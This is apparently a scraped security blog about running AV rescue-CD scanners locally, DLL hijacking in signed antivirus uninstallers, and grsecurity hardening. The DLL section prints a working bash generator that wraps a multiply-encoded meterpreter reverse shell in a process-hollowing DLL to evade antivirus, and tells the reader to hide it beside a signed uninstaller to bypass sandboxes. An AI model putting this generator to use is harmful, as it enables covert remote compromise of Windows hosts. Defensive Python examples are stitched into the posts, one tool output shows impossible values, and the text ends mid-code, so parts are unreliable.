drwxr-xr-x 2 user user 4096 Jun 26 2012 orsplnx32.0

./var/opt/f-secure/fssp/databases/aqualnx32.0:
total 112
-rw-r--r-- 1 user user 111311 May 28 2012 libaqua32.so

./var/opt/f-secure/fssp/databases/fmlibunix.0:
total 1668
-rwxr-xr-x 1 user user 1705956 Jun 26 2012 libfm-lnx32.so

./var/opt/f-secure/fssp/databases/hydralinux.0:
total 14676
-rw-r--r-- 1 user user 703 Jun 26 2012 01@hydra.pub
-rw-r--r-- 1 user user 458 Jun 26 2012 02@hydra.mf
-rw-r--r-- 1 user user 206 Jun 26 2012 02@hydra.ref
-rw-r--r-- 1 user user 1524 Jun 26 2012 BW_datapak.bif
-rw-r--r-- 1 user user 326 Jun 26 2012 BW_datapak.bis
-rw-r--r-- 1 user user 37 Jun 26 2012 bw_name.html
-rw-r--r-- 1 user user 358 Jun 26 2012 enginefiles-fselinux.set
-rw-r--r-- 1 user user 10272526 Jun 26 2012 fsedb.dat
-rw-r--r-- 1 user user 199 Jun 26 2012 fselinux.cr
-rw-r--r-- 1 user user 202 Jun 26 2012 FS@hydra.ini
-rw-r--r-- 1 user user 225 Jun 26 2012 hydralinux-update.ini
-rw-r--r-- 1 user user 10354 Jun 26 2012 hydralinux-update.mf
-rw-r--r-- 1 user user 22127 Jun 26 2012 info.iad
-rw-r--r-- 1 user user 4673277 Jun 26 2012 libfsecr32-linux.so
-rw-r--r-- 1 user user 2331 Jun 26 2012 licenses-fselinux.txt

./var/opt/f-secure/fssp/databases/orsplnx32.0:
total 140
-rw-r--r-- 1 user user 140513 Mar 29 2012 liborsp32.so

./var/opt/f-secure/fssp/log:
total 4
-rw-r--r-- 1 user user 954 Jun 26 2012 fsupdated.log

./var/opt/f-secure/fssp/run:
total 8
-rw-r--r-- 1 user user 6 Jun 26 2012 fsupdated.pid
-rw-r--r-- 1 user user 6 Jun 26 2012 fsupdated.rc.pid

./var/opt/f-secure/fssp/update:
total 0

We are now ready to run an update. The command is:

#/opt/f-secure/fssp/bin/dbupdate_lite

Finally we can scan files…


You can of course customize the whole package to your needs; feel free to experiment ;)

“Execute every act of thy life as though it were thy last.” 


Looting LiveCDs part 2.


Another great LiveCD is the one from Kaspersky Labs called Kaspersky Rescue Disk 10, downloadable from here: rescuedisk.kaspersky-labs.com/rescuedisk/updatable/kav_rescue_10.iso

It is a powerful antivirus scanning engine with many interesting and useful tools, which I wanted to try running locally on my Debian amd64 host. Disassembling the ISO was a little trickier than the one from F-Secure; for those interested I am posting a little howto on my progress. Of course there is the question of why do all this when I could just run the LiveCD with its GUI and do everything from there? In some cases it was more convenient for me to do manual scans from my local machine, and it was just too much of a hassle to do this via the LiveCD and VirtualBox, so I decided to extract the needed files from the LiveCD and try to run them separately.

First we download the Kaspersky Rescue Disk and mount the ISO in our filesystem:

# mount -o loop kav_rescue_10.iso /mnt/iso

Next we copy the squashfs file /mnt/iso/rescue/LiveOS/squashfs.img to some working directory in our home, for example KASPERSKY:

cp /mnt/iso/rescue/LiveOS/squashfs.img /home/user/KASPERSKY

Next we check what the file squashfs.img actually is:

root@Obelix:/home/user/KAV# file squashfs.img 
squashfs.img: Squashfs filesystem, little endian, version 4.0, 32095920895 bytes, 3 inodes, blocksize: 7 bytes, created: Thu May 18 03:10:24 2034

We need quite recent squashfs-tools, and I would not recommend the version from Debian stable. Just download the sources from sourceforge.net/projects/squashfs/files/, extract them and modify the Makefile to enable xz compression support by uncommenting the following line:

XZ_SUPPORT = 1

In order to compile with xz support we need some additional libs, so on Debian I did:

apt-get install liblzma-dev
apt-get install libzma
apt-get install xz-lzma

Now we run make, and if the compilation was successful we can copy the unsquashfs binary to /usr/local/bin:

cp unsquashfs /usr/local/bin

Now we can extract the squashfs.img file copied from the CD:

root@Obelix:/home/user/KASPERSKY# unsquashfs squashfs.img 
Parallel unsquashfs: Using 4 processors
1 inodes (474 blocks) to write

[====================================================|] 474/474 100%
created 1 files
created 2 directories
created 0 symlinks
created 0 devices
created 0 fifos
root@Obelix:/home/user/KASPERSKY#

OK, we end up with a directory squashfs-root containing a LiveOS subdirectory, which contains another image:

root@Obelix:/home/user/KASPERSKY/squashfs-root/LiveOS# file ext3fs.img 
ext3fs.img: Linux rev 1.0 ext3 filesystem data, UUID=85dd4ebe-fd1b-420b-8d20-bef37149b4ec
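The two file(1) results above come straight from on-disk magic numbers, and the detail that mattered for this build (whether the squashfs image needs xz support) is a single field in the squashfs superblock. The following is an added example, not code from the post: a small identifier for the image formats peeled here (ISO 9660 outer disc, squashfs, ext2/3/4), reporting the squashfs version and compressor and the ext superblock's journal flag and UUID. The sample images are constructed headers built in memory, with the UUID reused from the ext3fs.img output above; no real image is read.

```python
import struct
import uuid

SQUASHFS_MAGIC_LE = b"hsqs"          # 0x73717368 stored little-endian
SQUASHFS_COMPRESSORS = {1: "gzip", 2: "lzma", 3: "lzo", 4: "xz", 5: "lz4", 6: "zstd"}
EXT_SB_OFFSET = 1024                 # ext2/3/4 superblock starts 1 KiB into the image
EXT_MAGIC = 0xEF53                   # at superblock offset 56
EXT_COMPAT_HAS_JOURNAL = 0x0004      # s_feature_compat bit: ext3/ext4 rather than ext2
ISO_PVD_OFFSET = 16 * 2048           # ISO 9660 primary volume descriptor, sector 16


def identify_image(data: bytes) -> dict:
    """Classify a filesystem image by its on-disk magic, as file(1) does."""
    if len(data) >= 32 and data[:4] == SQUASHFS_MAGIC_LE:
        compressor = struct.unpack_from("<H", data, 20)[0]
        major, minor = struct.unpack_from("<HH", data, 28)
        return {"type": "squashfs", "version": f"{major}.{minor}",
                "compressor": SQUASHFS_COMPRESSORS.get(compressor, f"unknown({compressor})")}
    if len(data) >= EXT_SB_OFFSET + 1024:
        if struct.unpack_from("<H", data, EXT_SB_OFFSET + 56)[0] == EXT_MAGIC:
            compat = struct.unpack_from("<I", data, EXT_SB_OFFSET + 92)[0]
            raw_uuid = data[EXT_SB_OFFSET + 104:EXT_SB_OFFSET + 120]
            kind = "ext3/ext4 (has journal)" if compat & EXT_COMPAT_HAS_JOURNAL else "ext2"
            return {"type": kind, "uuid": str(uuid.UUID(bytes=raw_uuid))}
    if len(data) >= ISO_PVD_OFFSET + 6 and data[ISO_PVD_OFFSET + 1:ISO_PVD_OFFSET + 6] == b"CD001":
        return {"type": "iso9660"}
    return {"type": "unknown"}


# Constructed sample headers (only the fields the identifier reads are filled in).
def build_squashfs_header(compressor_id: int = 4, major: int = 4, minor: int = 0) -> bytes:
    hdr = bytearray(96)
    hdr[0:4] = SQUASHFS_MAGIC_LE
    struct.pack_into("<H", hdr, 20, compressor_id)
    struct.pack_into("<HH", hdr, 28, major, minor)
    return bytes(hdr)


def build_ext_image(journaled: bool = True,
                    fs_uuid: str = "85dd4ebe-fd1b-420b-8d20-bef37149b4ec") -> bytes:
    img = bytearray(4096)
    struct.pack_into("<H", img, EXT_SB_OFFSET + 56, EXT_MAGIC)
    struct.pack_into("<I", img, EXT_SB_OFFSET + 92, EXT_COMPAT_HAS_JOURNAL if journaled else 0)
    img[EXT_SB_OFFSET + 104:EXT_SB_OFFSET + 120] = uuid.UUID(fs_uuid).bytes
    return bytes(img)


def build_iso_image() -> bytes:
    img = bytearray(ISO_PVD_OFFSET + 2048)
    img[ISO_PVD_OFFSET] = 1                                  # descriptor type: primary
    img[ISO_PVD_OFFSET + 1:ISO_PVD_OFFSET + 6] = b"CD001"
    return bytes(img)


if __name__ == "__main__":
    # on a real file: identify_image(open(path, "rb").read(ISO_PVD_OFFSET + 2048))
    for label, img in [("squashfs.img", build_squashfs_header()),
                       ("ext3fs.img", build_ext_image()),
                       ("kav_rescue_10.iso", build_iso_image())]:
        print(label, identify_image(img))
```

A compressor value of 4 (xz) is exactly the case where a stock unsquashfs built without XZ_SUPPORT fails, so checking this field first tells you whether the rebuild described above is needed at all.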

We can now mount this file using the regular Linux mount command, like so:

mount -o loop ext3fs.img /mnt/disk

Next we copy the whole contents of /mnt/disk to our home working directory KASPERSKY:

cp -rv /mnt/disk /home/user/KASPERSKY

Once finished, chown the whole directory to your user so you can edit files. OK, we are almost there. Because the Kaspersky Antivirus Engine for Linux is compiled in such a way that it relies on a lot of custom libraries from Kaspersky Labs, there are some scripts that load the GUI scanner, located in /home/user/KASPERSKY/disk/usr/bin. The file we are interested in is kav.exe, a shell script that sets up LD_LIBRARY_PATH and so on so that the proper libraries are used when the application is launched. I decided not to touch these scripts as they proved very difficult to modify. If we try to run the script locally like this:

user@Obelix:~/KASPERSKY/disk/usr/bin$ ./kav.exe 
./kav.exe: line 3: script_l10n.sh: No such file or directory
./kav.exe: line 37: source: /var/log/winsysdir: is a directory
./kav.exe: line 38: /usr/lib/kl/kav: No such file or directory

We can see that the script looks in its designed folders, so let's chroot into the directory and see what we get. Before we run chroot, copy /etc/resolv.conf to /home/user/KASPERSKY/disk/etc so that the chrooted system can resolve DNS. Another important note: create custom mountpoints for the chroot environment in the /home/user/KASPERSKY/disk/discs directory:

mkdir /home/user/KASPERSKY/disk/discs/disk0
mkdir /home/user/KASPERSKY/disk/discs/disc1
mkdir /home/user/KASPERSKY/disk/discs/disk2
mkdir /home/user/KASPERSKY/disk/discs/disk3

and bind-mount whatever directory you wish to scan with Kaspersky:

mount -o bind /directory/to/scan /home/user/KASPERSKY/disk/discs/disk0

Now we are ready to chroot into the extracted filesystem:

root@Obelix:/home/user/KASPERSKY# chroot disk/
Obelix / #

OK, this worked; let's try and run the kav.exe shell script:

Obelix bin # ./kav.exe 
grep: /proc/cmdline: No such file or directory
./kav.exe: line 37: source: /var/log/winsysdir: is a directory
No protocol specified
No protocol specified
rd: cannot connect to X server :0.0

OK, we need to point the chroot's DISPLAY at our root display on the host X server and grant access to it. On the host you enable access from a terminal like this (note that xhost + disables X access control for every client, so revert it with xhost - once you are done):

 user@Obelix:~$ xhost +
access control disabled, clients can connect from any host

And in the chroot system set the DISPLAY variable like this:

Obelix bin # export DISPLAY=:0.0

Now we can try and run the kav.exe script.

It works, so we can now update the AV signatures either from the console or via the GUI. I chose the console, running the update before kav.exe is executed:

Obelix bin # ./kav_update 
grep: /proc/cmdline: No such file or directory
./kav_update: line 12: source: /var/log/winsysdir: is a directory
2013-07-25 1x:x6:xx     Updater                   starting   0%         
; --- Settings ---
; Notify before update: Yes
; Rescan quarantine:    No
; Update sources:
; 
; ------------------
2013-07-25 1x:x6:xx     Task started event  
2013-07-25 1x:x6:xx     Update source is selected http://dnl-10.geo.kaspersky.com/ 
2013-07-25 1x:x6:xx     Updater                   running    0%         
2013-07-25 1x:x6:xx     File downloaded index/u0607g.xml.dif 
2013-07-25 1x:x6:xx     Generate list of files to download  
2013-07-25 1x:x6:xx     File downloaded index/../bases/av/kdb/i386/kdb-i386-1211g.xml.dif 
2013-07-25 1x:x6:xx       
2013-07-25 1x:x6:xx     Updater                   completed             
;  --- Statistics ---
; Time Start:           2013-07-25 1x:x6:xx
; Time Finish:          2013-07-25 1x:x6:xx
; Completion:           100%
; Estimated traffic size:       11798
; Downloaded size:      11798
; Speed:        76.81 KB/sec
;  ------------------
Obelix bin #

Now let's test the antivirus against some Metasploit-generated payloads, for example…

As you can see it does its job. Compared with the F-Secure setup from the last article:

root@Obelix:/opt/f-secure/fssp/bin# ./fsav /home/user/Malware/
F-Secure Security Platform version 2.50  build 12970

Scan started at Thu Jul 25 1x:x6:xx 2013
Database version: 2013-07-24_07

/home/user/Malware/test1.exe: Infected: Backdoor.Shell.AC [Aquarius]
/home/user/Malware/test1.exe: Disinfect? (Yes, No, yes to All) No
/home/user/Malware/test1.exe: [disinfect failed]
/home/user/Malware/test1.exe: Infected: Backdoor.Shell.AC [Aquarius]
/home/user/Malware/test1.exe: Rename? (Yes, No, yes to All) No
/home/user/Malware/test1.exe: [rename failed]
/home/user/Malware/ComplexPath.exe: Infected: Trojan.GenericKDZ.20684 [Aquarius]
/home/user/Malware/ComplexPath.exe: Disinfect? (Yes, No, yes to All) No
/home/user/Malware/ComplexPath.exe: [disinfect failed]
/home/user/Malware/ComplexPath.exe: Infected: Trojan.GenericKDZ.20684 [Aquarius]
/home/user/Malware/ComplexPath.exe: Rename? (Yes, No, yes to All) No
/home/user/Malware/ComplexPath.exe: [rename failed]
/home/user/Malware/test2.exe: Infected: Backdoor.Shell.AC [Aquarius]
/home/user/Malware/test2.exe: Disinfect? (Yes, No, yes to All) No
/home/user/Malware/test2.exe: [disinfect failed]
/home/user/Malware/test2.exe: Infected: Backdoor.Shell.AC [Aquarius]
/home/user/Malware/test2.exe: Rename? (Yes, No, yes to All) No
/home/user/Malware/test2.exe: [rename failed]

Scan ended at Thu Jul 25 1x:x6:xx 2013
4 files scanned
3 files infected

Both AVs perform well; I still prefer F-Secure though.


Dll hijacking reloaded


Well, this issue has been discussed many times already, dating back a few years. A good description was originally published by HD Moore here: community.rapid7.com/community/metasploit/blog/2010/08/22/exploiting-dll-hijacking-flaws. There are many vulnerable applications out there, but in my recent research I wanted to check how some security companies audit their software before release. In a pentest scenario I wanted to use a digitally signed binary from some renowned AV vendor to load a custom-crafted meterpreter DLL, thus bypassing some sandboxing techniques. While some vendors proved to have good code, some, to my surprise, contain DLL hijacking flaws (in binaries digitally signed by the vendor). My testing scenario was a guest system running Windows 7 SP1 64-bit in VirtualBox and a Linux host with Metasploit. Let's see what the results were…

I decided to have a close look at the uninstall/removal utilities from various AV vendors. These are always either a single signed binary or a self-extracting executable containing a few other files which are digitally signed. The first one I chose to test was the Avast! Uninstall Utility (just Google it). It is a single executable file, digitally signed, designed to remove Avast products from Windows. It is called aswclear.exe. Next I checked the executable with Procmon.exe from the Sysinternals Suite to see what the file is actually doing, which DLLs it loads, etc. And I found an interesting part here:

The executable tries to load a DLL called UxTheme.dll first from its own path, and only then goes on to search the Windows DLL folders. So what if we use a specially crafted meterpreter DLL, call it UxTheme.dll and put it alongside the executable? It gets loaded by aswclear.exe, but because we use a meterpreter DLL the program just exits, and on the Linux listener box we get a reverse shell…
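The Procmon observation above is the audit step a vendor should run on its own signed binaries before release, and it can be automated from a Procmon CSV export rather than read off by eye. The following is an added example, not code from the post: it reads the CSV, collects every DLL name a process probed with NAME NOT FOUND outside the Windows directories (the search-order slot an attacker-supplied file would fill), and pairs it with the location the DLL was eventually loaded from. The column names are Procmon's standard export header; the rows are constructed to mirror the behaviour described above, not a real capture.

```python
import csv
import io
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# Constructed Procmon CSV export (standard Procmon column names; made-up rows).
SAMPLE_PROCMON_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"1:00:00.0000001 PM","aswclear.exe","1234","CreateFile","C:\Users\user\Desktop\UxTheme.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"1:00:00.0000002 PM","aswclear.exe","1234","CreateFile","C:\Windows\System32\UxTheme.dll","SUCCESS","Desired Access: Read Data/List Directory, Execute/Traverse"
"1:00:00.0000003 PM","aswclear.exe","1234","Load Image","C:\Windows\System32\UxTheme.dll","SUCCESS","Image Base: 0x7ffd0000, Image Size: 0x40000"
"1:00:00.0000004 PM","aswclear.exe","1234","Load Image","C:\Windows\System32\kernel32.dll","SUCCESS","Image Base: 0x7ffe0000, Image Size: 0x90000"
'''

# Probes inside these directories are the normal tail of the search order and are not reported.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\")


def find_hijack_candidates(csv_text: str) -> List[Dict[str, object]]:
    """Return one record per (process, DLL) that was probed-and-missed outside the
    system directories, with the path the DLL was finally loaded from (if any)."""
    missed: Dict[Tuple[str, str], List[str]] = defaultdict(list)
    loaded: Dict[Tuple[str, str], str] = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        path = row["Path"]
        name = path.rsplit("\\", 1)[-1].lower()
        if not name.endswith(".dll"):
            continue
        key = (row["Process Name"], name)
        if (row["Operation"] == "CreateFile" and row["Result"] == "NAME NOT FOUND"
                and not path.lower().startswith(SYSTEM_DIRS)):
            missed[key].append(path)
        elif row["Operation"] == "Load Image" and row["Result"] == "SUCCESS":
            loaded.setdefault(key, path)          # first successful load wins
    return [
        {"process": proc, "dll": name, "probed": paths, "loaded_from": loaded.get((proc, name))}
        for (proc, name), paths in missed.items()
    ]


def describe(candidate: Dict[str, object]) -> str:
    loaded_from: Optional[str] = candidate["loaded_from"]  # type: ignore[assignment]
    where = loaded_from if loaded_from else "never loaded (phantom DLL)"
    return (f"{candidate['process']}: {candidate['dll']} probed at "
            f"{', '.join(candidate['probed'])}; resolved to {where}")


if __name__ == "__main__":
    # on a real capture: find_hijack_candidates(open("Logfile.CSV", encoding="utf-8-sig").read())
    for cand in find_hijack_candidates(SAMPLE_PROCMON_CSV):
        print(describe(cand))
```

kernel32.dll is not reported because it was only ever resolved from System32; UxTheme.dll is, because the first probe landed in the application directory. Any DLL on that list should be either removed from the binary's imports, loaded with a full path, or pinned via SetDefaultDllDirectories/LoadLibraryEx flags before the build is signed.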

For the specially crafted DLL I have created a custom generator that creates C source code for the meterpreter DLL (the Metasploit-generated DLL gets flagged by almost every AV that I know):

#!/bin/bash
clear
echo "***************************************************************"
echo "       Automatic  shellcode generator - FOR METASPLOIT         "
echo "       By Astr0baby 2012                       Dll fun         " 
echo "       For Automatic Teensy programming and deployment         "
echo "***************************************************************"
echo -e "What IP are we gonna use  ex. 192.168.0.1?  \c"
read IP 
echo -e "What Port Number are we gonna listen to? : \c"
read port 
echo -e "And lastly how many times do we want to encode our payloads 1-20? : \c" 
read enumber
./msfpayload windows/meterpreter/reverse_tcp_dns  LHOST=$IP LPORT=$port EXITFUNC=thread R |./msfencode -e  x86/shikata_ga_nai  -c 1 -t raw |  ./msfencode -e  x86/fnstenv_mov -c $enumber -t raw | ./msfencode -e  x86/shikata_ga_nai  -c $enumber -t raw | ./msfencode -e  x86/jmp_call_additive -c 1 -t raw | ./msfencode -e x86/alpha_mixed -b '\x00'  > test.c 

mkdir -p ShellCode/Dll
mv test.c ShellCode/Dll 
cd ShellCode/Dll 

#We prepare the shellcode file to something usable using sed magic
sed -e 's/+/ /g' test.c > test2.c
sed -e 's/buf = //g' test2.c > final.c 
cat final.c >> clean.c

#Lets generate some files now 
#Generating template.h 
echo '#define SCSIZE 8196' > template.h
echo 'unsigned char function[SCSIZE] =' >> template.h 
cat clean.c >> template.h 
echo ';' >> template.h 

#Generating main template.c 
echo '#include <windows.h>' > template.c 
echo '#include "template.h"' >> template.c 
echo '#if BUILDMODE == 2' >> template.c 
echo 'void inline_bzero(void *p, size_t l)' >> template.c
echo '{' >> template.c
echo 'BYTE *q = (BYTE *)p;' >> template.c
echo 'size_t x = 0;' >> template.c
echo 'for (x = 0; x < l; x++)' >> template.c
echo '*(q++) = 0x00;' >> template.c
echo '}' >> template.c
echo '#endif' >> template.c
echo 'void ExecutePayload(void);' >> template.c
echo 'BOOL WINAPI' >> template.c
echo 'DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)' >> template.c
echo '{' >> template.c
echo 'switch (dwReason)' >> template.c
echo '{' >> template.c
echo 'case DLL_PROCESS_ATTACH:' >> template.c
echo ' ExecutePayload();' >> template.c
echo ' break;' >> template.c
echo 'case DLL_PROCESS_DETACH:' >> template.c
echo 'break;' >> template.c
echo 'case DLL_THREAD_ATTACH:' >> template.c
echo 'break;' >> template.c
echo ' case DLL_THREAD_DETACH:' >> template.c
echo 'break;' >> template.c
echo '}' >> template.c
echo 'return TRUE;' >> template.c
echo '}' >> template.c
echo 'void ExecutePayload(void) {' >> template.c
echo 'int error;' >> template.c
echo 'PROCESS_INFORMATION pi;' >> template.c
echo 'STARTUPINFO si;' >> template.c
echo 'CONTEXT ctx;' >> template.c
echo 'DWORD prot;' >> template.c
echo 'LPVOID ep;' >> template.c
echo 'inline_bzero( &si, sizeof( si ));' >> template.c
echo 'si.cb = sizeof(si);' >> template.c
echo 'if(CreateProcess( 0, "rundll32.exe", 0, 0, 0, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, 0, 0, &si, &pi)) {' >> template.c
echo ' ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;' >> template.c
echo 'GetThreadContext(pi.hThread, &ctx);' >> template.c
echo ' ep = (LPVOID) VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);' >> template.c
echo 'WriteProcessMemory(pi.hProcess,(PVOID)ep, &function, SCSIZE, 0);' >> template.c
echo '#ifdef _WIN64' >> template.c
echo 'ctx.Rip = (DWORD64)ep;' >> template.c
echo '#else' >> template.c
echo 'ctx.Eip = (DWORD)ep;' >> template.c 
echo '#endif' >> template.c
echo 'SetThreadContext(pi.hThread,&ctx);' >> template.c
echo 'ResumeThread(pi.hThread);' >> template.c
echo 'CloseHandle(pi.hThread);' >> template.c
echo 'CloseHandle(pi.hProcess);' >> template.c
echo '}' >> template.c
echo 'ExitThread(0);' >> template.c 
echo '}' >> template.c 
todos <template.c> TEMPLATE.c
todos <template.h> TEMPLATE.h
#Generating build.bat
echo '@echo off' > build.bat
echo 'cl.exe template.c -LD /Zl /GS- /DBUILDMODE=2 /link /entry:DllMain kernel32.lib' >> build.bat 
echo 'del *.def' >> build.bat
echo 'del *.h' >> build.bat
echo 'del *.rc' >> build.bat
echo 'del *.c' >> build.bat
echo 'del *.obj' >> build.bat 
todos <build.bat> BUILD.bat
rm template.c 
rm template.h
rm build.bat 
rm clean.c 
rm final.c 
rm test2.c 
rm test.c 
#Finished 
echo 'All files generated in ShellCode\Dll folder, please copy the folder to a WinBox with Visual Studio 2010 and run BUILD.bat'
cd .. 
cd ..

This script generates 3 files in the ShellCode/Dll folder which can be compiled using Visual Studio C++ 2010/2012. So once we have the DLL and aswclear.exe, we can for example hide the meterpreter UxTheme.dll via attrib commands and pack it together with aswclear.exe in a zip. A simple attrib +h +s +r UxTheme.dll will hide the file from default Explorer settings and from cmd.exe dir commands…

Some Sandbox technologies blindly trust digitally signed executables and do not check what Dlls they load.

I have checked the following vendor removal tools for Dll path flaws.

  • Kaspersky – kavremover.exe is flawed with exactly the same Dll problem as the above example
  • Panda – uninstaller.exe is a self-extracting exe containing a few dlls and exes; one of them is flawed.
  • F-Secure – uitool UninstallationTool.exe – fine
  • AVG – AVG Remover – fine
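A defender-side check for the packaging trick described above, added here as example code (not from the post): it inspects a zip archive for DLLs that sit beside an executable, carry the hidden/system attributes that attrib +h +s +r sets, or borrow the name of a Windows system DLL such as UxTheme.dll. The archive contents are constructed placeholders, and the system-DLL name list is illustrative only.

```python
import io
import zipfile

# MS-DOS attribute bits kept in the low byte of ZipInfo.external_attr for
# entries written by Windows tools; attrib +h +s +r sets all three.
ATTR_READONLY, ATTR_HIDDEN, ATTR_SYSTEM = 0x01, 0x02, 0x04
# Illustrative list only: names a side-loaded DLL borrows from the system directory.
KNOWN_SYSTEM_DLLS = {"uxtheme.dll"}

def build_sample_archive() -> bytes:
    """Constructed sample: a removal tool packed next to a hidden UxTheme.dll.
    The file bodies are placeholders, not real binaries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("aswclear.exe", b"placeholder exe body")
        dll = zipfile.ZipInfo("UxTheme.dll")
        dll.external_attr = ATTR_HIDDEN | ATTR_SYSTEM | ATTR_READONLY
        zf.writestr(dll, b"placeholder dll body")
        zf.writestr("readme.txt", b"run the tool")
    return buf.getvalue()

def suspicious_sideload_entries(archive: bytes) -> list:
    """Return (name, reasons) for every DLL in the archive that looks like a
    search-order hijack candidate: same directory as an .exe, hidden/system
    attributes, or a name shared with a Windows system DLL."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        infos = zf.infolist()
        exe_dirs = {i.filename.rpartition("/")[0]
                    for i in infos if i.filename.lower().endswith(".exe")}
        for info in infos:
            name = info.filename
            if not name.lower().endswith(".dll"):
                continue
            reasons = []
            if name.rpartition("/")[0] in exe_dirs:
                reasons.append("dll in the same directory as an exe")
            if name.rpartition("/")[2].lower() in KNOWN_SYSTEM_DLLS:
                reasons.append("shares a name with a Windows system DLL")
            dos_attr = info.external_attr & 0xFF
            if dos_attr & ATTR_HIDDEN:
                reasons.append("hidden attribute set")
            if dos_attr & ATTR_SYSTEM:
                reasons.append("system attribute set")
            if reasons:
                findings.append((name, reasons))
    return findings
```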

Finally a short video for a little demonstration



Grsecurity/PAX hardened Kernel


While playing around with all those meterpreter binary payloads on Linux, either in a virtual environment or on a live system, an important question comes to mind: how do I prevent this from executing on my machine? I do not wish to get too technical here, and I am sure this is nothing new really; nevertheless, the best thing I could get my hands on is the GRSEC patch set, period.

I have never used it before on my desktop (Debian 64bit), so I have decided to give it a try after seeing an interesting Finnish LiveCD, Digabi (http://sourceforge.net/projects/digabi/), which is a Live-Linux distro for The Matriculation Examination Board of Finland.

Installation is pretty straightforward for those that have compiled a custom kernel before. Download the grsecurity patches from their site at http://grsecurity.net/download.php (available for both the 2.6.x and 3.2.x stable branches of the Linux kernel) and patch the kernel:

# cd linux-3.2.x
# patch -p1 < ../grsecurity-2.9.1-3.2xxxxxx.patch

Since my Debian system was running the backport Debian kernel vmlinuz-3.2.0-0.bpo.2-amd64, I decided to reuse its config-3.2.0-bpo.2-amd64 via make oldconfig when compiling the grsec-patched kernel. During make oldconfig I was asked about additional options that were missing from the backport kernel 3.2.0-0.bpo.2-amd64 and which were present in the 3.2.51 vanilla kernel plus grsec patches.

One should read the documentation about the Grsecurity/PAX configuration options here.

On Debian I have done the following to compile the kernel:

# fakeroot make deb-pkg

Once compiled, install the deb package (it can get quite big, as the debugging symbols have not been stripped out) and boot into the new kernel.

What I tested first was the following:

Metasploit generated executable payloads

  • ShellcodeExecute with Alpha encoded payload inside the executable -  gcc compiled
  • msfencode -t elf -e x86/shikata_ga_nai >> executable (reverse_tcp)
  • unsigned char shellcode[]=  – gcc compiled

Metasploit win32 executable payloads for Windows, executed via wine.

  • ShellcodeExecute with Alpha encoded payload inside the executable -  Visual Studio compiled
  • msfencode -t exe (various types)
  • unsigned char shellcode[]= Visual Studio compiled

None of the payloads work with the default GRSEC/PAX settings in the patched kernel. Here are some console outputs for the reference:

user@Obelix:~/stuff/metasploit/ShellCode$ ./Executive
dmesg….
[ 9311.625455] PAX: execution attempt in: /dev/zero (deleted), e8fc0000-e8fc1000 00000000
[ 9311.625462] PAX: terminating task: /home/user/stuff/metasploit/ShellCode/Executive(Executive):8527, uid/euid: 1000/1000, PC: 00000000e8fc0000, SP: 00000000f7234d5c
[ 9311.625466] PAX: bytes at PC: 89 e7 db d1 d9 77 f4 5a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 43
[ 9311.625478] PAX: bytes at SP-8: 00000579 f7234d88 08048523 e8fc0000 08049750 00000579 00001000 e8f9aff4 0804971c f7234d88 e8f9aff4 00000000 00000000 f7234da8 0804855f 08049750 e8f9aff4 08048580 f7234db8 e8e878a5 f7234dc0 f7234e38
user@Obelix:~/Malware$ wine test.exe
err:virtual:map_image failed to set 60000020 protection on section .text, noexec filesystem?
Killed
dmesg
[ 9354.532356] PAX: execution attempt in: <anonymous mapping>, 00401000-0041a000 00401000
[ 9354.532360] PAX: terminating task: /usr/local/bin/wine-preloader(test.exe):8553, uid/euid: 1000/1000, PC: 0000000000414000, SP: 000000000032fe74
[ 9354.532362] PAX: bytes at PC: e8 08 00 00 00 6a 00 ff 15 50 90 41 00 55 89 e5 81 ec 34 01
[ 9354.532369] PAX: bytes at SP-8: 00000000 00000000 e326d08c 7ffdf000 00000000 e32ab5f0 7ffdf000 0032fec8 e327062b 7ffdf000 00414000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 e340d86c f1f66d74
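Those dmesg lines are the detection signal a grsec kernel gives you. The following added example (not part of the original post) parses them into one record per killed task, using the two incidents quoted above as constructed sample input, and labels where the refused code lived (anonymous mapping versus a deleted file mapping).

```python
import re
from dataclasses import dataclass

# Constructed sample log: the two PAX incidents quoted in the post (an ELF
# shellcode runner, then a Win32 payload under wine), in dmesg format.
SAMPLE_DMESG = """\
[ 9311.625455] PAX: execution attempt in: /dev/zero (deleted), e8fc0000-e8fc1000 00000000
[ 9311.625462] PAX: terminating task: /home/user/stuff/metasploit/ShellCode/Executive(Executive):8527, uid/euid: 1000/1000, PC: 00000000e8fc0000, SP: 00000000f7234d5c
[ 9311.625466] PAX: bytes at PC: 89 e7 db d1 d9 77 f4 5a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 43
[ 9354.532356] PAX: execution attempt in: <anonymous mapping>, 00401000-0041a000 00401000
[ 9354.532360] PAX: terminating task: /usr/local/bin/wine-preloader(test.exe):8553, uid/euid: 1000/1000, PC: 0000000000414000, SP: 000000000032fe74
[ 9354.532362] PAX: bytes at PC: e8 08 00 00 00 6a 00 ff 15 50 90 41 00 55 89 e5 81 ec 34 01
"""

DMESG_TS = re.compile(r"^\[\s*[\d.]+\]\s*")
ATTEMPT = re.compile(r"PAX: execution attempt in: (?P<mapping>.+?), "
                     r"(?P<start>[0-9a-f]+)-(?P<end>[0-9a-f]+) [0-9a-f]+$")
TERMINATE = re.compile(r"PAX: terminating task: (?P<path>.+?)\((?P<comm>[^()]*)\):(?P<pid>\d+), "
                       r"uid/euid: (?P<uid>\d+)/\d+, PC: (?P<pc>[0-9a-f]+), SP: [0-9a-f]+$")
PCBYTES = re.compile(r"PAX: bytes at PC: (?P<hexbytes>[0-9a-f ]+)$")

@dataclass
class PaxIncident:
    mapping: str          # backing object of the page PaX refused to execute
    start: int            # mapping bounds, from the "execution attempt" line
    end: int
    path: str = ""        # killed task, from the "terminating task" line
    comm: str = ""
    pid: int = 0
    uid: int = 0
    pc: int = 0
    pc_bytes: bytes = b""  # first bytes of the refused code, handy for triage

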